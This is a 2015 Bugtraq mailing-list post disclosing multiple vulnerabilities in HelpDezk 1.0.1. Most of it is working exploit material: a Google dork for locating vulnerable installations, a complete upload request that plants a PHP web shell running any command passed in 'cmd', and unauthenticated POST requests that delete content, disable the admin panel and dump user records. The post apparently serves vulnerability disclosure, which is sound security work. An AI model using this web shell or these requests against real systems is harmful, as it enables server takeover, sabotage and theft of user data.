lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201502262059.t1QKxEcH010075@sf01web1.securityfocus.com>
Date: Thu, 26 Feb 2015 20:59:14 GMT
From: dennis.veninga@...il.com
To: bugtraq@...urityfocus.com
Subject: HelpDezk 1.0.1 Multiple Vulnerabilities

# Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities
# Google Dork: "intext: helpdezk-community-1.0.1"
# Date: 26-2-2015
# Exploit Author: Dennis Veninga
# Vendor Homepage: http://www.helpdezk.org/
# Vendor contacted: 26-2-2015
# Version: 1.0.1
# Tested on: Firefox 36 & Chrome 38 / W8.1-x64

HelpDezk ->
Version:   		1.0.1
Type:      		Multiple Critical Vulnerabilities
Severity:   		Critical
Info Exploit:  		Different exploits making it possible to take over the website/server

- Arbitrary File Upload
- Remote Command Execution
- User Information Disclosure

###############################################
Arbitrary File Upload, 2 ways ->
1. Direct Access:
http://{target}/helpdezk/admin/logos/upload
#########

2. POST: http://localhost/helpdezk/admin/logos/upload
After posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoami

CONTENT: 
-----------------------------14463264629720\r\n
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\r\n
if(isset($_REQUEST['cmd'])){\r\n
$cmd = ($_REQUEST["cmd"]);\r\n
system($cmd);\r\n
echo "</pre>$cmd<pre>";\r\n
die;\r\n
}\r\n
?>\r\n
-----------------------------14463264629720--\r\n

###############################################
Remote Command Execution, you see an white page with 'ok' when SUCCESS!

Delete a download
POST: http://localhost/helpdezk/admin/downloads/delete
CONTENT: id={IDNUMBER}  

Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again*
POST: http://{localhost}/helpdezk/admin/modules/deactivate
CONTENT: id=1

id=1 = Admin
id=2 = Dashboard
id=3 = HelpDezk
###############################################
User Information Disclosure
NOTE: Stop javascript, else it will quickly show all info and returns you to the login page.

POST: http://{target}/helpdezk/admin/relPessoa/table_json/
CONTENT: typeperson=ALL
###############################################

I'm sure I didn't find everything, but maybe time to fix those huge issues first!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ